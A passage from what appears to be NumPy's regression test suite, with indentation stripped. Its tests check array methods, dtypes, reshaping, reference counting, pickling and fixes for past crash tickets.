x = x.byteswap()
assert_(x['one'] > 1 and x['two'] > 2)
def test_method_args(self, level=rlevel):
# Make sure methods and functions have same default axis
# keyword and arguments
funcs1= ['argmax', 'argmin', 'sum', ('product', 'prod'),
('sometrue', 'any'),
('alltrue', 'all'), 'cumsum', ('cumproduct', 'cumprod'),
'ptp', 'cumprod', 'prod', 'std', 'var', 'mean',
'round', 'min', 'max', 'argsort', 'sort']
funcs2 = ['compress', 'take', 'repeat']
for func in funcs1:
arr = np.random.rand(8, 7)
arr2 = arr.copy()
if isinstance(func, tuple):
func_meth = func[1]
func = func[0]
else:
func_meth = func
res1 = getattr(arr, func_meth)()
res2 = getattr(np, func)(arr2)
if res1 is None:
res1 = arr
if res1.dtype.kind in 'uib':
assert_((res1 == res2).all(), func)
else:
assert_(abs(res1-res2).max() < 1e-8, func)
for func in funcs2:
arr1 = np.random.rand(8, 7)
arr2 = np.random.rand(8, 7)
res1 = None
if func == 'compress':
arr1 = arr1.ravel()
res1 = getattr(arr2, func)(arr1)
else:
arr2 = (15*arr2).astype(int).ravel()
if res1 is None:
res1 = getattr(arr1, func)(arr2)
res2 = getattr(np, func)(arr1, arr2)
assert_(abs(res1-res2).max() < 1e-8, func)
def test_mem_lexsort_strings(self, level=rlevel):
"""Ticket #298"""
lst = ['abc', 'cde', 'fgh']
np.lexsort((lst,))
def test_fancy_index(self, level=rlevel):
"""Ticket #302"""
x = np.array([1, 2])[np.array([0])]
assert_equal(x.shape, (1,))
def test_recarray_copy(self, level=rlevel):
"""Ticket #312"""
dt = [('x', np.int16), ('y', np.float64)]
ra = np.array([(1, 2.3)], dtype=dt)
rb = np.rec.array(ra, dtype=dt)
rb['x'] = 2.
assert_(ra['x'] != rb['x'])
def test_rec_fromarray(self, level=rlevel):
"""Ticket #322"""
x1 = np.array([[1, 2], [3, 4], [5, 6]])
x2 = np.array(['a', 'dd', 'xyz'])
x3 = np.array([1.1, 2, 3])
np.rec.fromarrays([x1, x2, x3], formats="(2,)i4,a3,f8")
def test_object_array_assign(self, level=rlevel):
x = np.empty((2, 2), object)
x.flat[2] = (1, 2, 3)
assert_equal(x.flat[2], (1, 2, 3))
def test_ndmin_float64(self, level=rlevel):
"""Ticket #324"""
x = np.array([1, 2, 3], dtype=np.float64)
assert_equal(np.array(x, dtype=np.float32, ndmin=2).ndim, 2)
assert_equal(np.array(x, dtype=np.float64, ndmin=2).ndim, 2)
def test_ndmin_order(self, level=rlevel):
"""Issue #465 and related checks"""
assert_(np.array([1, 2], order='C', ndmin=3).flags.c_contiguous)
assert_(np.array([1, 2], order='F', ndmin=3).flags.f_contiguous)
assert_(np.array(np.ones((2, 2), order='F'), ndmin=3).flags.f_contiguous)
assert_(np.array(np.ones((2, 2), order='C'), ndmin=3).flags.c_contiguous)
def test_mem_axis_minimization(self, level=rlevel):
"""Ticket #327"""
data = np.arange(5)
data = np.add.outer(data, data)
def test_mem_float_imag(self, level=rlevel):
"""Ticket #330"""
np.float64(1.0).imag
def test_dtype_tuple(self, level=rlevel):
"""Ticket #334"""
assert_(np.dtype('i4') == np.dtype(('i4', ())))
def test_dtype_posttuple(self, level=rlevel):
"""Ticket #335"""
np.dtype([('col1', '()i4')])
def test_numeric_carray_compare(self, level=rlevel):
"""Ticket #341"""
assert_equal(np.array(['X'], 'c'), asbytes('X'))
def test_string_array_size(self, level=rlevel):
"""Ticket #342"""
self.assertRaises(ValueError,
np.array, [['X'], ['X', 'X', 'X']], '|S1')
def test_dtype_repr(self, level=rlevel):
"""Ticket #344"""
dt1=np.dtype(('uint32', 2))
dt2=np.dtype(('uint32', (2,)))
assert_equal(dt1.__repr__(), dt2.__repr__())
def test_reshape_order(self, level=rlevel):
"""Make sure reshape order works."""
a = np.arange(6).reshape(2, 3, order='F')
assert_equal(a, [[0, 2, 4], [1, 3, 5]])
a = np.array([[1, 2], [3, 4], [5, 6], [7, 8]])
b = a[:, 1]
assert_equal(b.reshape(2, 2, order='F'), [[2, 6], [4, 8]])
def test_reshape_zero_strides(self, level=rlevel):
"""Issue #380, test reshaping of zero strided arrays"""
a = np.ones(1)
a = np.lib.stride_tricks.as_strided(a, shape=(5,), strides=(0,))
assert_(a.reshape(5, 1).strides[0] == 0)
def test_reshape_zero_size(self, level=rlevel):
"""Github Issue #2700, setting shape failed for 0-sized arrays"""
a = np.ones((0, 2))
a.shape = (-1, 2)
# Cannot test if NPY_RELAXED_STRIDES_CHECKING changes the strides.
# With NPY_RELAXED_STRIDES_CHECKING the test becomes superfluous.
@dec.skipif(np.ones(1).strides[0] == np.iinfo(np.intp).max)
def test_reshape_trailing_ones_strides(self):
# Github issue gh-2949, bad strides for trailing ones of new shape
a = np.zeros(12, dtype=np.int32)[::2] # not contiguous
strides_c = (16, 8, 8, 8)
strides_f = (8, 24, 48, 48)
assert_equal(a.reshape(3, 2, 1, 1).strides, strides_c)
assert_equal(a.reshape(3, 2, 1, 1, order='F').strides, strides_f)
assert_equal(np.array(0, dtype=np.int32).reshape(1, 1).strides, (4, 4))
def test_repeat_discont(self, level=rlevel):
"""Ticket #352"""
a = np.arange(12).reshape(4, 3)[:, 2]
assert_equal(a.repeat(3), [2, 2, 2, 5, 5, 5, 8, 8, 8, 11, 11, 11])
def test_array_index(self, level=rlevel):
"""Make sure optimization is not called in this case."""
a = np.array([1, 2, 3])
a2 = np.array([[1, 2, 3]])
assert_equal(a[np.where(a==3)], a2[np.where(a2==3)])
def test_object_argmax(self, level=rlevel):
a = np.array([1, 2, 3], dtype=object)
assert_(a.argmax() == 2)
def test_recarray_fields(self, level=rlevel):
"""Ticket #372"""
dt0 = np.dtype([('f0', 'i4'), ('f1', 'i4')])
dt1 = np.dtype([('f0', 'i8'), ('f1', 'i8')])
for a in [np.array([(1, 2), (3, 4)], "i4,i4"),
np.rec.array([(1, 2), (3, 4)], "i4,i4"),
np.rec.array([(1, 2), (3, 4)]),
np.rec.fromarrays([(1, 2), (3, 4)], "i4,i4"),
np.rec.fromarrays([(1, 2), (3, 4)])]:
assert_(a.dtype in [dt0, dt1])
def test_random_shuffle(self, level=rlevel):
"""Ticket #374"""
a = np.arange(5).reshape((5, 1))
b = a.copy()
np.random.shuffle(b)
assert_equal(np.sort(b, axis=0), a)
def test_refcount_vdot(self, level=rlevel):
"""Changeset #3443"""
_assert_valid_refcount(np.vdot)
def test_startswith(self, level=rlevel):
ca = np.char.array(['Hi', 'There'])
assert_equal(ca.startswith('H'), [True, False])
def test_noncommutative_reduce_accumulate(self, level=rlevel):
"""Ticket #413"""
tosubtract = np.arange(5)
todivide = np.array([2.0, 0.5, 0.25])
assert_equal(np.subtract.reduce(tosubtract), -10)
assert_equal(np.divide.reduce(todivide), 16.0)
assert_array_equal(np.subtract.accumulate(tosubtract),
np.array([0, -1, -3, -6, -10]))
assert_array_equal(np.divide.accumulate(todivide),
np.array([2., 4., 16.]))
def test_convolve_empty(self, level=rlevel):
"""Convolve should raise an error for empty input array."""
self.assertRaises(ValueError, np.convolve, [], [1])
self.assertRaises(ValueError, np.convolve, [1], [])
def test_multidim_byteswap(self, level=rlevel):
"""Ticket #449"""
r=np.array([(1, (0, 1, 2))], dtype="i2,3i2")
assert_array_equal(r.byteswap(),
np.array([(256, (0, 256, 512))], r.dtype))
def test_string_NULL(self, level=rlevel):
"""Changeset 3557"""
assert_equal(np.array("a\x00\x0b\x0c\x00").item(),
'a\x00\x0b\x0c')
def test_junk_in_string_fields_of_recarray(self, level=rlevel):
"""Ticket #483"""
r = np.array([[asbytes('abc')]], dtype=[('var1', '|S20')])
assert_(asbytes(r['var1'][0][0]) == asbytes('abc'))
def test_take_output(self, level=rlevel):
"""Ensure that 'take' honours output parameter."""
x = np.arange(12).reshape((3, 4))
a = np.take(x, [0, 2], axis=1)
b = np.zeros_like(a)
np.take(x, [0, 2], axis=1, out=b)
assert_array_equal(a, b)
def test_take_object_fail(self):
# Issue gh-3001
d = 123.
a = np.array([d, 1], dtype=object)
ref_d = sys.getrefcount(d)
try:
a.take([0, 100])
except IndexError:
pass
assert_(ref_d == sys.getrefcount(d))
def test_array_str_64bit(self, level=rlevel):
"""Ticket #501"""
s = np.array([1, np.nan], dtype=np.float64)
with np.errstate(all='raise'):
sstr = np.array_str(s)
def test_frompyfunc_endian(self, level=rlevel):
"""Ticket #503"""
from math import radians
uradians = np.frompyfunc(radians, 1, 1)
big_endian = np.array([83.4, 83.5], dtype='>f8')
little_endian = np.array([83.4, 83.5], dtype='<f8')
assert_almost_equal(uradians(big_endian).astype(float),
uradians(little_endian).astype(float))
def test_mem_string_arr(self, level=rlevel):
"""Ticket #514"""
s = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
t = []
np.hstack((t, s ))
def test_arr_transpose(self, level=rlevel):
"""Ticket #516"""
x = np.random.rand(*(2,)*16)
y = x.transpose(list(range(16)))
def test_string_mergesort(self, level=rlevel):
"""Ticket #540"""
x = np.array(['a']*32)
assert_array_equal(x.argsort(kind='m'), np.arange(32))
def test_argmax_byteorder(self, level=rlevel):
"""Ticket #546"""
a = np.arange(3, dtype='>f')
assert_(a[a.argmax()] == a.max())
def test_rand_seed(self, level=rlevel):
"""Ticket #555"""
for l in np.arange(4):
np.random.seed(l)
def test_mem_deallocation_leak(self, level=rlevel):
"""Ticket #562"""
a = np.zeros(5, dtype=float)
b = np.array(a, dtype=float)
del a, b
def test_mem_on_invalid_dtype(self):
"Ticket #583"
self.assertRaises(ValueError, np.fromiter, [['12', ''], ['13', '']], str)
def test_dot_negative_stride(self, level=rlevel):
"""Ticket #588"""
x = np.array([[1, 5, 25, 125., 625]])
y = np.array([[20.], [160.], [640.], [1280.], [1024.]])
z = y[::-1].copy()
y2 = y[::-1]
assert_equal(np.dot(x, z), np.dot(x, y2))
def test_object_casting(self, level=rlevel):
# This used to trigger the object-type version of
# the bitwise_or operation, because float64 -> object
# casting succeeds
def rs():
x = np.ones([484, 286])
y = np.zeros([484, 286])
x |= y
self.assertRaises(TypeError, rs)
def test_unicode_scalar(self, level=rlevel):
"""Ticket #600"""
x = np.array(["DROND", "DROND1"], dtype="U6")
el = x[1]
new = pickle.loads(pickle.dumps(el))
assert_equal(new, el)
def test_arange_non_native_dtype(self, level=rlevel):
"""Ticket #616"""
for T in ('>f4', '<f4'):
dt = np.dtype(T)
assert_equal(np.arange(0, dtype=dt).dtype, dt)
assert_equal(np.arange(0.5, dtype=dt).dtype, dt)
assert_equal(np.arange(5, dtype=dt).dtype, dt)
def test_bool_indexing_invalid_nr_elements(self, level=rlevel):
s = np.ones(10, dtype=float)
x = np.array((15,), dtype=float)
def ia(x, s, v): x[(s>0)]=v
self.assertRaises(ValueError, ia, x, s, np.zeros(9, dtype=float))
self.assertRaises(ValueError, ia, x, s, np.zeros(11, dtype=float))
# Old special case (different code path):
self.assertRaises(ValueError, ia, x.flat, s, np.zeros(9, dtype=float))
def test_mem_scalar_indexing(self, level=rlevel):
"""Ticket #603"""
x = np.array([0], dtype=float)
index = np.array(0, dtype=np.int32)
x[index]
def test_binary_repr_0_width(self, level=rlevel):
assert_equal(np.binary_repr(0, width=3), '000')
def test_fromstring(self, level=rlevel):
assert_equal(np.fromstring("12:09:09", dtype=int, sep=":"),
[12, 9, 9])
def test_searchsorted_variable_length(self, level=rlevel):
x = np.array(['a', 'aa', 'b'])
y = np.array(['d', 'e'])
assert_equal(x.searchsorted(y), [3, 3])
def test_string_argsort_with_zeros(self, level=rlevel):
"""Check argsort for strings containing zeros."""
x = np.fromstring("\x00\x02\x00\x01", dtype="|S2")
assert_array_equal(x.argsort(kind='m'), np.array([1, 0]))
assert_array_equal(x.argsort(kind='q'), np.array([1, 0]))
def test_string_sort_with_zeros(self, level=rlevel):
"""Check sort for strings containing zeros."""
x = np.fromstring("\x00\x02\x00\x01", dtype="|S2")
y = np.fromstring("\x00\x01\x00\x02", dtype="|S2")
assert_array_equal(np.sort(x, kind="q"), y)
def test_copy_detection_zero_dim(self, level=rlevel):
"""Ticket #658"""
np.indices((0, 3, 4)).T.reshape(-1, 3)
def test_flat_byteorder(self, level=rlevel):
"""Ticket #657"""
x = np.arange(10)
assert_array_equal(x.astype('>i4'), x.astype('<i4').flat[:])
assert_array_equal(x.astype('>i4').flat[:], x.astype('<i4'))
def test_uint64_from_negative(self, level=rlevel) :
assert_equal(np.uint64(-2), np.uint64(18446744073709551614))
def test_sign_bit(self, level=rlevel):
x = np.array([0, -0.0, 0])
assert_equal(str(np.abs(x)), '[ 0. 0. 0.]')
def test_flat_index_byteswap(self, level=rlevel):
for dt in (np.dtype('<i4'), np.dtype('>i4')):
x = np.array([-1, 0, 1], dtype=dt)
assert_equal(x.flat[0].dtype, x[0].dtype)
def test_copy_detection_corner_case(self, level=rlevel):
"""Ticket #658"""
np.indices((0, 3, 4)).T.reshape(-1, 3)
# Cannot test if NPY_RELAXED_STRIDES_CHECKING changes the strides.
# With NPY_RELAXED_STRIDES_CHECKING the test becomes superfluous,
# 0-sized reshape itself is tested elsewhere.
@dec.skipif(np.ones(1).strides[0] == np.iinfo(np.intp).max)
def test_copy_detection_corner_case2(self, level=rlevel):
"""Ticket #771: strides are not set correctly when reshaping 0-sized
arrays"""
b = np.indices((0, 3, 4)).T.reshape(-1, 3)
assert_equal(b.strides, (3 * b.itemsize, b.itemsize))
def test_object_array_refcounting(self, level=rlevel):
"""Ticket #633"""
if not hasattr(sys, 'getrefcount'):
return
# NB. this is probably CPython-specific
cnt = sys.getrefcount
a = object()
b = object()
c = object()
cnt0_a = cnt(a)
cnt0_b = cnt(b)
cnt0_c = cnt(c)
# -- 0d -> 1d broadcasted slice assignment
arr = np.zeros(5, dtype=np.object_)
arr[:] = a
assert_equal(cnt(a), cnt0_a + 5)
arr[:] = b
assert_equal(cnt(a), cnt0_a)
assert_equal(cnt(b), cnt0_b + 5)
arr[:2] = c
assert_equal(cnt(b), cnt0_b + 3)
assert_equal(cnt(c), cnt0_c + 2)
del arr
# -- 1d -> 2d broadcasted slice assignment
arr = np.zeros((5, 2), dtype=np.object_)
arr0 = np.zeros(2, dtype=np.object_)
arr0[0] = a
assert_(cnt(a) == cnt0_a + 1)
arr0[1] = b
assert_(cnt(b) == cnt0_b + 1)
arr[:,:] = arr0
assert_(cnt(a) == cnt0_a + 6)
assert_(cnt(b) == cnt0_b + 6)
arr[:, 0] = None
assert_(cnt(a) == cnt0_a + 1)
del arr, arr0
# -- 2d copying + flattening
arr = np.zeros((5, 2), dtype=np.object_)
arr[:, 0] = a
arr[:, 1] = b
assert_(cnt(a) == cnt0_a + 5)
assert_(cnt(b) == cnt0_b + 5)
arr2 = arr.copy()
assert_(cnt(a) == cnt0_a + 10)
assert_(cnt(b) == cnt0_b + 10)
arr2 = arr[:, 0].copy()
assert_(cnt(a) == cnt0_a + 10)
assert_(cnt(b) == cnt0_b + 5)
arr2 = arr.flatten()
assert_(cnt(a) == cnt0_a + 10)
assert_(cnt(b) == cnt0_b + 10)
del arr, arr2
# -- concatenate, repeat, take, choose
arr1 = np.zeros((5, 1), dtype=np.object_)
arr2 = np.zeros((5, 1), dtype=np.object_)
arr1[...] = a
arr2[...] = b
assert_(cnt(a) == cnt0_a + 5)
assert_(cnt(b) == cnt0_b + 5)
arr3 = np.concatenate((arr1, arr2))
assert_(cnt(a) == cnt0_a + 5 + 5)
assert_(cnt(b) == cnt0_b + 5 + 5)
arr3 = arr1.repeat(3, axis=0)
assert_(cnt(a) == cnt0_a + 5 + 3*5)
arr3 = arr1.take([1, 2, 3], axis=0)
assert_(cnt(a) == cnt0_a + 5 + 3)
x = np.array([[0], [1], [0], [1], [1]], int)
arr3 = x.choose(arr1, arr2)
assert_(cnt(a) == cnt0_a + 5 + 2)
assert_(cnt(b) == cnt0_b + 5 + 3)
def test_mem_custom_float_to_array(self, level=rlevel):
"""Ticket 702"""
class MyFloat(object):
def __float__(self):
return 1.0
tmp = np.atleast_1d([MyFloat()])
tmp2 = tmp.astype(float)
def test_object_array_refcount_self_assign(self, level=rlevel):
"""Ticket #711"""
class VictimObject(object):
deleted = False
def __del__(self):
self.deleted = True
d = VictimObject()
arr = np.zeros(5, dtype=np.object_)
arr[:] = d
del d
arr[:] = arr # refcount of 'd' might hit zero here
assert_(not arr[0].deleted)
arr[:] = arr # trying to induce a segfault by doing it again...
assert_(not arr[0].deleted)
def test_mem_fromiter_invalid_dtype_string(self, level=rlevel):
x = [1, 2, 3]
self.assertRaises(ValueError,
np.fromiter, [xi for xi in x], dtype='S')
def test_reduce_big_object_array(self, level=rlevel):
"""Ticket #713"""
oldsize = np.setbufsize(10*16)
a = np.array([None]*161, object)
assert_(not np.any(a))
np.setbufsize(oldsize)
def test_mem_0d_array_index(self, level=rlevel):
"""Ticket #714"""
np.zeros(10)[np.array(0)]
def test_floats_from_string(self, level=rlevel):
"""Ticket #640, floats from string"""
fsingle = np.single('1.234')
fdouble = np.double('1.234')
flongdouble = np.longdouble('1.234')
assert_almost_equal(fsingle, 1.234)
assert_almost_equal(fdouble, 1.234)
assert_almost_equal(flongdouble, 1.234)
def test_nonnative_endian_fill(self, level=rlevel):
""" Non-native endian arrays were incorrectly filled with scalars before
r5034.
"""
if sys.byteorder == 'little':
dtype = np.dtype('>i4')
else:
dtype = np.dtype('<i4')
x = np.empty([1], dtype=dtype)
x.fill(1)
assert_equal(x, np.array([1], dtype=dtype))
def test_dot_alignment_sse2(self, level=rlevel):
"""Test for ticket #551, changeset r5140"""
x = np.zeros((30, 40))
y = pickle.loads(pickle.dumps(x))
# y is now typically not aligned on a 8-byte boundary
z = np.ones((1, y.shape[0]))
# This shouldn't cause a segmentation fault:
np.dot(z, y)
def test_astype_copy(self, level=rlevel):
"""Ticket #788, changeset r5155"""
# The test data file was generated by scipy.io.savemat.
# The dtype is float64, but the isbuiltin attribute is 0.
data_dir = path.join(path.dirname(__file__), 'data')
filename = path.join(data_dir, "astype_copy.pkl")
if sys.version_info[0] >= 3:
f = open(filename, 'rb')
xp = pickle.load(f, encoding='latin1')
f.close()
else:
f = open(filename)
xp = pickle.load(f)
f.close()
xpd = xp.astype(np.float64)
assert_((xp.__array_interface__['data'][0] !=
xpd.__array_interface__['data'][0]))
def test_compress_small_type(self, level=rlevel):
"""Ticket #789, changeset 5217.
"""
# compress with out argument segfaulted if cannot cast safely
import numpy as np
a = np.array([[1, 2], [3, 4]])
b = np.zeros((2, 1), dtype = np.single)
try:
a.compress([True, False], axis = 1, out = b)
raise AssertionError("compress with an out which cannot be " \
"safely casted should not return "\
"successfully")
except TypeError:
pass
def test_attributes(self, level=rlevel):
"""Ticket #791
"""
class TestArray(np.ndarray):
def __new__(cls, data, info):
result = np.array(data)
result = result.view(cls)
result.info = info
return result
def __array_finalize__(self, obj):
self.info = getattr(obj, 'info', '')
dat = TestArray([[1, 2, 3, 4], [5, 6, 7, 8]], 'jubba')
assert_(dat.info == 'jubba')
dat.resize((4, 2))
assert_(dat.info == 'jubba')
dat.sort()
assert_(dat.info == 'jubba')
dat.fill(2)
assert_(dat.info == 'jubba')
dat.put([2, 3, 4], [6, 3, 4])
assert_(dat.info == 'jubba')
dat.setfield(4, np.int32, 0)
assert_(dat.info == 'jubba')
dat.setflags()
assert_(dat.info == 'jubba')
assert_(dat.all(1).info == 'jubba')
assert_(dat.any(1).info == 'jubba')
assert_(dat.argmax(1).info == 'jubba')
assert_(dat.argmin(1).info == 'jubba')
assert_(dat.argsort(1).info == 'jubba')
assert_(dat.astype(TestArray).info == 'jubba')
assert_(dat.byteswap().info == 'jubba')
assert_(dat.clip(2, 7).info == 'jubba')
assert_(dat.compress([0, 1, 1]).info == 'jubba')
assert_(dat.conj().info == 'jubba')
assert_(dat.conjugate().info == 'jubba')
assert_(dat.copy().info == 'jubba')
dat2 = TestArray([2, 3, 1, 0], 'jubba')
choices = [[0, 1, 2, 3], [10, 11, 12, 13],
[20, 21, 22, 23], [30, 31, 32, 33]]
assert_(dat2.choose(choices).info == 'jubba')
assert_(dat.cumprod(1).info == 'jubba')
assert_(dat.cumsum(1).info == 'jubba')
assert_(dat.diagonal().info == 'jubba')
assert_(dat.flatten().info == 'jubba')
assert_(dat.getfield(np.int32, 0).info == 'jubba')
assert_(dat.imag.info == 'jubba')
assert_(dat.max(1).info == 'jubba')
assert_(dat.mean(1).info == 'jubba')
assert_(dat.min(1).info == 'jubba')
assert_(dat.newbyteorder().info == 'jubba')
assert_(dat.nonzero()[0].info == 'jubba')
assert_(dat.nonzero()[1].info == 'jubba')
assert_(dat.prod(1).info == 'jubba')
assert_(dat.ptp(1).info == 'jubba')
assert_(dat.ravel().info == 'jubba')
assert_(dat.real.info == 'jubba')
assert_(dat.repeat(2).info == 'jubba')
assert_(dat.reshape((2, 4)).info == 'jubba')
assert_(dat.round().info == 'jubba')
assert_(dat.squeeze().info == 'jubba')
assert_(dat.std(1).info == 'jubba')
assert_(dat.sum(1).info == 'jubba')
assert_(dat.swapaxes(0, 1).info == 'jubba')
assert_(dat.take([2, 3, 5]).info == 'jubba')
assert_(dat.transpose().info == 'jubba')
assert_(dat.T.info == 'jubba')
assert_(dat.var(1).info == 'jubba')
assert_(dat.view(TestArray).info == 'jubba')
def test_recarray_tolist(self, level=rlevel):
"""Ticket #793, changeset r5215
"""
# Comparisons fail for NaN, so we can't use random memory
# for the test.
buf = np.zeros(40, dtype=np.int8)
a = np.recarray(2, formats="i4,f8,f8", names="id,x,y", buf=buf)
b = a.tolist()
assert_( a[0].tolist() == b[0])
assert_( a[1].tolist() == b[1])
def test_nonscalar_item_method(self):
# Make sure that .item() fails graciously when it should
a = np.arange(5)
assert_raises(ValueError, a.item)
def test_char_array_creation(self, level=rlevel):
a = np.array('123', dtype='c')
b = np.array(asbytes_nested(['1', '2', '3']))
assert_equal(a, b)
def test_unaligned_unicode_access(self, level=rlevel) :
"""Ticket #825"""
for i in range(1, 9) :
msg = 'unicode offset: %d chars'%i
t = np.dtype([('a', 'S%d'%i), ('b', 'U2')])
x = np.array([(asbytes('a'), sixu('b'))], dtype=t)
if sys.version_info[0] >= 3:
assert_equal(str(x), "[(b'a', 'b')]", err_msg=msg)
else:
assert_equal(str(x), "[('a', u'b')]", err_msg=msg)
def test_sign_for_complex_nan(self, level=rlevel):
"""Ticket 794."""
with np.errstate(invalid='ignore'):
C = np.array([-np.inf, -2+1j, 0, 2-1j, np.inf, np.nan])
have = np.sign(C)
want = np.array([-1+0j, -1+0j, 0+0j, 1+0j, 1+0j, np.nan])
assert_equal(have, want)
def test_for_equal_names(self, level=rlevel):
"""Ticket #674"""
dt = np.dtype([('foo', float), ('bar', float)])
a = np.zeros(10, dt)
b = list(a.dtype.names)
b[0] = "notfoo"
a.dtype.names = b
assert_(a.dtype.names[0] == "notfoo")
assert_(a.dtype.names[1] == "bar")
def test_for_object_scalar_creation(self, level=rlevel):
"""Ticket #816"""
a = np.object_()
b = np.object_(3)
b2 = np.object_(3.0)
c = np.object_([4, 5])
d = np.object_([None, {}, []])
assert_(a is None)
assert_(type(b) is int)
assert_(type(b2) is float)
assert_(type(c) is np.ndarray)
assert_(c.dtype == object)
assert_(d.dtype == object)
def test_array_resize_method_system_error(self):
"""Ticket #840 - order should be an invalid keyword."""
x = np.array([[0, 1], [2, 3]])
self.assertRaises(TypeError, x.resize, (2, 2), order='C')
def test_for_zero_length_in_choose(self, level=rlevel):
"Ticket #882"
a = np.array(1)
self.assertRaises(ValueError, lambda x: x.choose([]), a)
def test_array_ndmin_overflow(self):
"Ticket #947."
self.assertRaises(ValueError, lambda: np.array([1], ndmin=33))
def test_errobj_reference_leak(self, level=rlevel):
"""Ticket #955"""
with np.errstate(all="ignore"):
z = int(0)
p = np.int32(-1)
gc.collect()
n_before = len(gc.get_objects())
z**p # this shouldn't leak a reference to errobj
gc.collect()
n_after = len(gc.get_objects())
assert_(n_before >= n_after, (n_before, n_after))
def test_void_scalar_with_titles(self, level=rlevel):
"""No ticket"""
data = [('john', 4), ('mary', 5)]
dtype1 = [(('source:yy', 'name'), 'O'), (('source:xx', 'id'), int)]
arr = np.array(data, dtype=dtype1)
assert_(arr[0][0] == 'john')
assert_(arr[0][1] == 4)
def test_void_scalar_constructor(self):
#Issue #1550
#Create test string data, construct void scalar from data and assert
#that void scalar contains original data.
test_string = np.array("test")
test_string_void_scalar = np.core.multiarray.scalar(
np.dtype(("V", test_string.dtype.itemsize)), test_string.tobytes())
assert_(test_string_void_scalar.view(test_string.dtype) == test_string)
#Create record scalar, construct from data and assert that
#reconstructed scalar is correct.
test_record = np.ones((), "i,i")
test_record_void_scalar = np.core.multiarray.scalar(
test_record.dtype, test_record.tobytes())
assert_(test_record_void_scalar == test_record)
#Test pickle and unpickle of void and record scalars
assert_(pickle.loads(pickle.dumps(test_string)) == test_string)
assert_(pickle.loads(pickle.dumps(test_record)) == test_record)
def test_blasdot_uninitialized_memory(self):
"""Ticket #950"""
for m in [0, 1, 2]:
for n in [0, 1, 2]:
for k in range(3):
# Try to ensure that x->data contains non-zero floats
x = np.array([123456789e199], dtype=np.float64)
x.resize((m, 0))
y = np.array([123456789e199], dtype=np.float64)
y.resize((0, n))
# `dot` should just return zero (m,n) matrix
z = np.dot(x, y)
assert_(np.all(z == 0))
assert_(z.shape == (m, n))
def test_zeros(self):
"""Regression test for #1061."""
# Set a size which cannot fit into a 64 bits signed integer
sz = 2 ** 64
good = 'Maximum allowed dimension exceeded'
try:
np.empty(sz)
except ValueError as e:
if not str(e) == good:
self.fail("Got msg '%s', expected '%s'" % (e, good))
except Exception as e:
self.fail("Got exception of type %s instead of ValueError" % type(e))
def test_huge_arange(self):
"""Regression test for #1062."""
# Set a size which cannot fit into a 64 bits signed integer
sz = 2 ** 64
good = 'Maximum allowed size exceeded'
try:
a = np.arange(sz)
            self.assertTrue(np.size(a) == sz)
except ValueError as e:
if not str(e) == good:
self.fail("Got msg '%s', expected '%s'" % (e, good))
except Exception as e:
self.fail("Got exception of type %s instead of ValueError" % type(e))
def test_fromiter_bytes(self):
"""Ticket #1058"""
a = np.fromiter(list(range(10)), dtype='b')
b = np.fromiter(list(range(10)), dtype='B')
assert_(np.alltrue(a == np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])))
assert_(np.alltrue(b == np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])))
def test_array_from_sequence_scalar_array(self):
"""Ticket #1078: segfaults when creating an array with a sequence of 0d
arrays."""
a = np.array((np.ones(2), np.array(2)))
assert_equal(a.shape, (2,))
assert_equal(a.dtype, np.dtype(object))
assert_equal(a[0], np.ones(2))
assert_equal(a[1], np.array(2))
a = np.array(((1,), np.array(1)))
assert_equal(a.shape, (2,))
assert_equal(a.dtype, np.dtype(object))
assert_equal(a[0], (1,))
assert_equal(a[1], np.array(1))
def test_array_from_sequence_scalar_array2(self):
"""Ticket #1081: weird array with strange input..."""
t = np.array([np.array([]), np.array(0, object)])
assert_equal(t.shape, (2,))
assert_equal(t.dtype, np.dtype(object))
def test_array_too_big(self):
"""Ticket #1080."""
assert_raises(ValueError, np.zeros, [975]*7, np.int8)
assert_raises(ValueError, np.zeros, [26244]*5, np.int8)
def test_dtype_keyerrors_(self):
"""Ticket #1106."""
dt = np.dtype([('f1', np.uint)])
assert_raises(KeyError, dt.__getitem__, "f2")
assert_raises(IndexError, dt.__getitem__, 1)
assert_raises(ValueError, dt.__getitem__, 0.0)
def test_lexsort_buffer_length(self):
"""Ticket #1217, don't segfault."""
a = np.ones(100, dtype=np.int8)
b = np.ones(100, dtype=np.int32)
i = np.lexsort((a[::-1], b))
assert_equal(i, np.arange(100, dtype=np.int))
def test_object_array_to_fixed_string(self):
"""Ticket #1235."""
a = np.array(['abcdefgh', 'ijklmnop'], dtype=np.object_)
b = np.array(a, dtype=(np.str_, 8))
assert_equal(a, b)
c = np.array(a, dtype=(np.str_, 5))
assert_equal(c, np.array(['abcde', 'ijklm']))
d = np.array(a, dtype=(np.str_, 12))
assert_equal(a, d)
e = np.empty((2, ), dtype=(np.str_, 8))
e[:] = a[:]
assert_equal(a, e)
def test_unicode_to_string_cast(self):
"""Ticket #1240."""
a = np.array(
[ [sixu('abc'), sixu('\u03a3')],
[sixu('asdf'), sixu('erw')]
], dtype='U')
def fail():
b = np.array(a, 'S4')
self.assertRaises(UnicodeEncodeError, fail)
def test_mixed_string_unicode_array_creation(self):
a = np.array(['1234', sixu('123')])
assert_(a.itemsize == 16)
a = np.array([sixu('123'), '1234'])
assert_(a.itemsize == 16)
a = np.array(['1234', sixu('123'), '12345'])
assert_(a.itemsize == 20)
a = np.array([sixu('123'), '1234', sixu('12345')])
assert_(a.itemsize == 20)
a = np.array([sixu('123'), '1234', sixu('1234')])
assert_(a.itemsize == 16)
def test_misaligned_objects_segfault(self):
"""Ticket #1198 and #1267"""
a1 = np.zeros((10,), dtype='O,c')
a2 = np.array(['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j'], 'S10')
a1['f0'] = a2
r = repr(a1)
np.argmax(a1['f0'])
a1['f0'][1] = "FOO"
a1['f0'] = "FOO"
a3 = np.array(a1['f0'], dtype='S')
np.nonzero(a1['f0'])
a1.sort()
a4 = copy.deepcopy(a1)
def test_misaligned_scalars_segfault(self):
"""Ticket #1267"""
s1 = np.array(('a', 'Foo'), dtype='c,O')
s2 = np.array(('b', 'Bar'), dtype='c,O')
s1['f1'] = s2['f1']
s1['f1'] = 'Baz'
def test_misaligned_dot_product_objects(self):
"""Ticket #1267"""
# This didn't require a fix, but it's worth testing anyway, because
# it may fail if .dot stops enforcing the arrays to be BEHAVED
a = np.array([[(1, 'a'), (0, 'a')], [(0, 'a'), (1, 'a')]], dtype='O,c')
